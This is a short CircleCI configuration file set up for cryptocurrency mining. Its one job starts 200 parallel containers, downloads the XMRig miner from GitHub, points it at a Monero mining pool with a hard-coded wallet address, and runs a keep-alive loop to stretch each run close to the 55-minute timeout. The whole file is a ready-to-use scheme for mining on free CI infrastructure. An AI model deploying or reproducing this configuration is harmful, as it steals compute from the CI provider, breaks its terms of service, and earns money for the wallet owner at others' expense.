# .circleci/config.yml  (200 miners, 55 min, auto-restart)
version: 2.1
jobs:
  mine:
    docker:
      - image: cimg/base:stable
    resource_class: small
    parallelism: 200          # ‚Üê 200 identical containers
    steps:
      - run:
          name: mine
          no_output_timeout: 55m
          command: |
            sudo apt-get -qq update && sudo apt-get -y install wget
            wget -q https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-x64.tar.gz
            tar -xf xmrig-6.21.0-linux-x64.tar.gz
            cd xmrig-*
            ./xmrig -o pool.supportxmr.com:3333 \
                    -u 45y6ZGMXwSLdgioMFmPovte3dGiwYNuF9eNNU8gXP5F86sPkgiBsdemZU4M2DsUE7fd7eCSbHHcwiUCgi4RvxUQwBW1cBws \
                    -p x -t 2 &
            while true; do echo "[$(date)] alive"; sleep 1500; done

workflows:
  version: 2
  mine:
    jobs:
      - mine
